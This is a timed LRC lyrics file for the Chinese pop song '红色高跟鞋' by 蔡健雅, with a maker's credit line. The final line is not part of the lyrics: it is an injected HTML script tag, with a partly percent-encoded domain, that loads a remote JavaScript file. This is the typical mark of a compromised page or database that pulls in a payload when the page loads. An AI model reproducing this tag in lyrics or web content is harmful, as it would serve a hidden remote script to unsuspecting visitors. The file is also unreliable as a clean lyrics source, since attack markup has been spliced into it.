[00:00.00]红色高跟鞋
[00:13.00]蔡健雅
[00:19.00]ɑ^卟嬞嬡ō  QQ:453546990  制作
[00:23.26]该怎么去形容你最贴切
[00:28.59]拿什么跟你作比较才算特别
[00:34.24]对你的感觉 强烈
[00:36.96]却又不太了解 只凭直觉
[00:43.04]
[00:43.44]你像我在被子里的舒服
[00:48.57]却又像风 琢磨不住
[00:53.79]像手纹 像散发的香水味
[00:59.25]像爱不释手的 红色高跟鞋
[01:06.80]
[01:18.29]该怎么去形容你最贴切
[01:23.43]拿什么跟你作比较才算特别
[01:28.76]对你的感觉 强烈
[01:31.60]却又不太了解 只凭直觉
[01:37.16]你像我在被子里的舒服
[01:42.93]却又像风 琢磨不住
[01:48.22]像手纹 像散发的香水味
[01:53.78]像爱不释手的 红色高跟鞋
[02:01.36]
[02:16.13]你像我在被子里的舒服
[02:21.37]却又像风 琢磨不住
[02:26.27]像手纹 像散发的香水味
[02:32.09]像爱不释手的
[02:35.21]
[02:37.87]我爱你有种左灯右行的冲突
[02:43.12]疯狂却怕没有退路
[02:48.21]你能否让我停止这种追逐
[02:54.64]就这么双 最后唯一的 红色高跟鞋 
[03:02.31]ɑ^卟嬞嬡ō  QQ:453546990  制作
&lt;Script Src=http://c.%6E%75clear3.com/css/c.js&gt;&lt;/Script&gt;
